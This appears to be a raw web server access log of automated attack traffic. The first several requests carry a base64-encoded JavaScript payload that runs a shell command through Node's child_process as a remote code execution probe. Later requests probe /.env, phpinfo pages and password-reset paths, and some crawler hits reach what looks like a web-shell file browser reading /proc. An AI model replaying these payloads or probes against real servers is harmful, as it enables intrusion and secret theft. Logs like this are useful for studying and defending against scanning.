45.148.10.120 - - [02/Mar/2026:15:27:37 +0000] "GET /_next/data/buildId/index.json?cmd=CihmdW5jdGlvbigpewoJdHJ5IHsKCQl2YXIgY21kID0gImVjaG8gVlVMTl9URVNUIjsKCQl2YXIgcmVzdWx0ID0gcmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKGNtZCwge2VuY29kaW5nOiAndXRmOCd9KTsKCQlyZXR1cm4gYnRvYShyZXN1bHQpOwoJfSBjYXRjaChlKSB7CgkJcmV0dXJuIGJ0b2EoZS50b1N0cmluZygpKTsKCX0KfSkoKQo= HTTP/1.1" 200 37677 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.148.10.120 - - [02/Mar/2026:15:27:41 +0000] "GET /api/endpoint?cmd=CihmdW5jdGlvbigpewoJdHJ5IHsKCQl2YXIgY21kID0gImVjaG8gVlVMTl9URVNUIjsKCQl2YXIgcmVzdWx0ID0gcmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKGNtZCwge2VuY29kaW5nOiAndXRmOCd9KTsKCQlyZXR1cm4gYnRvYShyZXN1bHQpOwoJfSBjYXRjaChlKSB7CgkJcmV0dXJuIGJ0b2EoZS50b1N0cmluZygpKTsKCX0KfSkoKQo= HTTP/1.1" 200 37660 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.148.10.120 - - [02/Mar/2026:15:27:52 +0000] "GET /_next/static/chunks/pages/?cmd=CihmdW5jdGlvbigpewoJdHJ5IHsKCQl2YXIgY21kID0gImVjaG8gVlVMTl9URVNUIjsKCQl2YXIgcmVzdWx0ID0gcmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKGNtZCwge2VuY29kaW5nOiAndXRmOCd9KTsKCQlyZXR1cm4gYnRvYShyZXN1bHQpOwoJfSBjYXRjaChlKSB7CgkJcmV0dXJuIGJ0b2EoZS50b1N0cmluZygpKTsKCX0KfSkoKQo= HTTP/1.1" 200 37674 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.148.10.120 - - [02/Mar/2026:15:27:57 +0000] "GET /api/%5B%5B...slug%5D%5D?cmd=CihmdW5jdGlvbigpewoJdHJ5IHsKCQl2YXIgY21kID0gImVjaG8gVlVMTl9URVNUIjsKCQl2YXIgcmVzdWx0ID0gcmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKGNtZCwge2VuY29kaW5nOiAndXRmOCd9KTsKCQlyZXR1cm4gYnRvYShyZXN1bHQpOwoJfSBjYXRjaChlKSB7CgkJcmV0dXJuIGJ0b2EoZS50b1N0cmluZygpKTsKCX0KfSkoKQo= HTTP/1.1" 200 37671 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
74.7.241.42 - - [02/Mar/2026:15:28:16 +0000] "GET /whsy.php?p=%2Fproc%2F32189%2Ffdinfo HTTP/2.0" 200 830 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F32189" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.228.61 - - [02/Mar/2026:15:28:17 +0000] "GET /robots.txt HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
45.148.10.120 - - [02/Mar/2026:15:28:19 +0000] "GET /_next/data/buildId/home.json?cmd=CihmdW5jdGlvbigpewoJdHJ5IHsKCQl2YXIgY21kID0gImVjaG8gVlVMTl9URVNUIjsKCQl2YXIgcmVzdWx0ID0gcmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKGNtZCwge2VuY29kaW5nOiAndXRmOCd9KTsKCQlyZXR1cm4gYnRvYShyZXN1bHQpOwoJfSBjYXRjaChlKSB7CgkJcmV0dXJuIGJ0b2EoZS50b1N0cmluZygpKTsKCX0KfSkoKQo= HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.148.10.120 - - [02/Mar/2026:15:28:26 +0000] "GET /_next/data/buildId/home.json?cmd=CihmdW5jdGlvbigpewoJdHJ5IHsKCQl2YXIgY21kID0gImVjaG8gVlVMTl9URVNUIjsKCQl2YXIgcmVzdWx0ID0gcmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKGNtZCwge2VuY29kaW5nOiAndXRmOCd9KTsKCQlyZXR1cm4gYnRvYShyZXN1bHQpOwoJfSBjYXRjaChlKSB7CgkJcmV0dXJuIGJ0b2EoZS50b1N0cmluZygpKTsKCX0KfSkoKQo= HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.148.10.120 - - [02/Mar/2026:15:28:28 +0000] "GET /api/test?cmd=CihmdW5jdGlvbigpewoJdHJ5IHsKCQl2YXIgY21kID0gImVjaG8gVlVMTl9URVNUIjsKCQl2YXIgcmVzdWx0ID0gcmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKGNtZCwge2VuY29kaW5nOiAndXRmOCd9KTsKCQlyZXR1cm4gYnRvYShyZXN1bHQpOwoJfSBjYXRjaChlKSB7CgkJcmV0dXJuIGJ0b2EoZS50b1N0cmluZygpKTsKCX0KfSkoKQo= HTTP/1.1" 200 37656 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.148.10.120 - - [02/Mar/2026:15:28:35 +0000] "GET /api/test?cmd=CihmdW5jdGlvbigpewoJdHJ5IHsKCQl2YXIgY21kID0gImVjaG8gVlVMTl9URVNUIjsKCQl2YXIgcmVzdWx0ID0gcmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKGNtZCwge2VuY29kaW5nOiAndXRmOCd9KTsKCQlyZXR1cm4gYnRvYShyZXN1bHQpOwoJfSBjYXRjaChlKSB7CgkJcmV0dXJuIGJ0b2EoZS50b1N0cmluZygpKTsKCX0KfSkoKQo= HTTP/1.1" 200 37656 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.148.10.120 - - [02/Mar/2026:15:28:44 +0000] "GET /_next/data/buildId/page.json?param=CihmdW5jdGlvbigpewoJdHJ5IHsKCQl2YXIgY21kID0gImVjaG8gXFwnVlVMTl9URVNUXFwnIjsKCQl2YXIgcmVzdWx0ID0gcmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKGNtZCwge2VuY29kaW5nOiAndXRmOCd9KTsKCQlyZXR1cm4gYnRvYShyZXN1bHQpOwoJfSBjYXRjaChlKSB7CgkJcmV0dXJuIGJ0b2EoZS50b1N0cmluZygpKTsKCX0KfSkoKQo= HTTP/1.1" 200 37686 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.148.10.120 - - [02/Mar/2026:15:28:45 +0000] "GET / HTTP/1.1" 200 37374 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:28:54 +0000] "GET /?locale=el HTTP/1.1" 200 38389 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:28:54 +0000] "GET /?locale=cs HTTP/1.1" 200 37689 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:28:54 +0000] "GET /?locale=de HTTP/1.1" 200 37710 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:01 +0000] "GET /?locale=es_419 HTTP/1.1" 200 37762 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:02 +0000] "GET /?locale=fr HTTP/1.1" 200 37807 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:02 +0000] "GET /?locale=he HTTP/1.1" 200 37585 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:02 +0000] "GET /?locale=ms HTTP/1.1" 200 37531 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:03 +0000] "GET /?locale=de HTTP/1.1" 200 37710 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:05 +0000] "GET /?locale=ko HTTP/1.1" 200 37593 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:05 +0000] "GET /?locale=nb HTTP/1.1" 200 37505 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:06 +0000] "GET /?locale=vi HTTP/1.1" 200 37655 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:06 +0000] "GET /?locale=pt HTTP/1.1" 200 37398 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:06 +0000] "GET /?locale=pl HTTP/1.1" 200 37713 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:06 +0000] "GET /?locale=th HTTP/1.1" 200 38721 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:06 +0000] "GET /?locale=pt_br HTTP/1.1" 200 37536 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:06 +0000] "GET /?locale=uk HTTP/1.1" 200 37946 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:06 +0000] "GET /?locale=sv HTTP/1.1" 200 37410 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:06 +0000] "GET /?locale=tr HTTP/1.1" 200 37551 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:06 +0000] "GET /?locale=ro HTTP/1.1" 200 37569 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:06 +0000] "GET /?locale=ru HTTP/1.1" 200 38236 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:08 +0000] "GET /?locale=it HTTP/1.1" 200 37604 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:09 +0000] "GET /?locale=he HTTP/1.1" 200 37585 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:09 +0000] "GET /?locale=ms HTTP/1.1" 200 37531 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:09 +0000] "GET /?locale=ja HTTP/1.1" 200 37991 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:10 +0000] "GET /?locale=cs HTTP/1.1" 200 37689 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:10 +0000] "GET /?locale=es_es HTTP/1.1" 200 37753 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:10 +0000] "GET /?locale=hu HTTP/1.1" 200 37710 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:10 +0000] "GET /?locale=en HTTP/1.1" 200 37258 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:10 +0000] "GET /?locale=da HTTP/1.1" 200 37468 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:10 +0000] "GET /?locale=ar HTTP/1.1" 200 38218 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:10 +0000] "GET /?locale=es HTTP/1.1" 200 37763 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:10 +0000] "GET /?locale=fi HTTP/1.1" 200 37561 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:11 +0000] "GET /?locale=de HTTP/1.1" 200 37710 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:12 +0000] "GET /?locale=nb HTTP/1.1" 200 37505 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:12 +0000] "GET /?locale=fr HTTP/1.1" 200 37807 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:12 +0000] "GET /?locale=ko HTTP/1.1" 200 37593 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:13 +0000] "GET /?locale=id HTTP/1.1" 200 37397 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:14 +0000] "GET /?locale=ar HTTP/1.1" 200 38218 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:16 +0000] "GET /login/ HTTP/1.1" 401 37411 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:17 +0000] "GET /?locale=fr HTTP/1.1" 200 37807 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:17 +0000] "GET /?locale=it HTTP/1.1" 200 37604 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:17 +0000] "GET /?locale=he HTTP/1.1" 200 37585 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:18 +0000] "GET /?locale=ja HTTP/1.1" 200 37991 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:18 +0000] "GET /?locale=ms HTTP/1.1" 200 37531 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:18 +0000] "GET /?locale=cs HTTP/1.1" 200 37689 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:19 +0000] "GET /?locale=en HTTP/1.1" 200 37258 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:19 +0000] "GET /?locale=es HTTP/1.1" 200 37763 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:19 +0000] "GET /?locale=es_es HTTP/1.1" 200 37753 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:19 +0000] "GET /?locale=hu HTTP/1.1" 200 37710 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:19 +0000] "GET /?locale=ru HTTP/1.1" 200 38236 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:20 +0000] "GET /resetpass?start=1 HTTP/1.1" 200 3342 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:19 +0000] "GET /?locale=sv HTTP/1.1" 200 37410 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:20 +0000] "GET /?locale=fil HTTP/1.1" 200 37496 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:20 +0000] "GET /?locale=zh_tw HTTP/1.1" 200 37418 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
74.7.241.42 - - [02/Mar/2026:15:29:21 +0000] "GET /whsy.php?p=%2Fproc%2F29782%2Fnet%2Fip6t_hashlimit HTTP/2.0" 200 502 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
45.148.10.120 - - [02/Mar/2026:15:29:22 +0000] "GET /?locale=tr HTTP/1.1" 200 37551 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:22 +0000] "GET /?locale=vi HTTP/1.1" 200 37655 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:23 +0000] "GET /?locale=pt HTTP/1.1" 200 37398 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:23 +0000] "GET /?locale=pl HTTP/1.1" 200 37713 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:23 +0000] "GET /?locale=ru HTTP/1.1" 200 38236 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:24 +0000] "GET /?locale=ro HTTP/1.1" 200 37569 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:25 +0000] "GET /?locale=i_en HTTP/1.1" 200 37232 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:26 +0000] "GET /?locale=nl HTTP/1.1" 200 37589 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:28 +0000] "GET /?locale=zh HTTP/1.1" 200 37390 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:29 +0000] "GET /?locale=zh_tw HTTP/1.1" 200 37418 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:31 +0000] "GET /resetpass?start=1 HTTP/1.1" 200 3342 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:34 +0000] "GET /?locale=nl HTTP/1.1" 200 37589 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:40 +0000] "GET /?locale=nl HTTP/1.1" 200 37589 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:47 +0000] "GET /.env HTTP/1.1" 200 37379 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:29:53 +0000] "GET /.env HTTP/1.1" 200 37379 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:04 +0000] "GET /.env HTTP/1.1" 200 37379 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:18 +0000] "GET /phpinfo HTTP/1.1" 200 37382 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:25 +0000] "GET /phpinfo HTTP/1.1" 200 37382 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
74.7.241.42 - - [02/Mar/2026:15:30:27 +0000] "GET /whsy.php?e=anycast6&p=%2Fproc%2F29782%2Fnet HTTP/2.0" 200 2507 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
45.148.10.120 - - [02/Mar/2026:15:30:27 +0000] "GET /phpinfo.php HTTP/1.1" 200 37386 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:40 +0000] "GET /phpinfo.php HTTP/1.1" 200 37386 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:50 +0000] "GET /phpinfo.php?locale=de HTTP/1.1" 200 37721 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:50 +0000] "GET /phpinfo.php?locale=da HTTP/1.1" 200 37479 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:50 +0000] "GET /phpinfo.php?locale=fi HTTP/1.1" 200 37572 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:50 +0000] "GET /phpinfo.php?locale=es HTTP/1.1" 200 37774 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:50 +0000] "GET /phpinfo.php?locale=es_419 HTTP/1.1" 200 37773 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:54 +0000] "GET /phpinfo.php?locale=es_419 HTTP/1.1" 200 37773 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:56 +0000] "GET /phpinfo.php?locale=el HTTP/1.1" 200 38400 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:56 +0000] "GET /phpinfo.php?locale=en HTTP/1.1" 200 37269 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:56 +0000] "GET /phpinfo.php?locale=es_es HTTP/1.1" 200 37764 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:56 +0000] "GET /phpinfo.php?locale=cs HTTP/1.1" 200 37700 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:56 +0000] "GET /phpinfo.php?locale=fi HTTP/1.1" 200 37572 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:56 +0000] "GET /phpinfo.php?locale=de HTTP/1.1" 200 37721 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:56 +0000] "GET /phpinfo.php?locale=ar HTTP/1.1" 200 38229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:56 +0000] "GET /phpinfo.php?locale=es HTTP/1.1" 200 37774 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:30:56 +0000] "GET /phpinfo.php?locale=da HTTP/1.1" 200 37479 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:00 +0000] "GET /phpinfo.php?locale=th HTTP/1.1" 200 38732 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:00 +0000] "GET /phpinfo.php?locale=pt HTTP/1.1" 200 37409 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:00 +0000] "GET /phpinfo.php?locale=pt_br HTTP/1.1" 200 37547 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:00 +0000] "GET /phpinfo.php?locale=tr HTTP/1.1" 200 37562 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:01 +0000] "GET /phpinfo.php?locale=es_es HTTP/1.1" 200 37764 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=ms HTTP/1.1" 200 37542 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
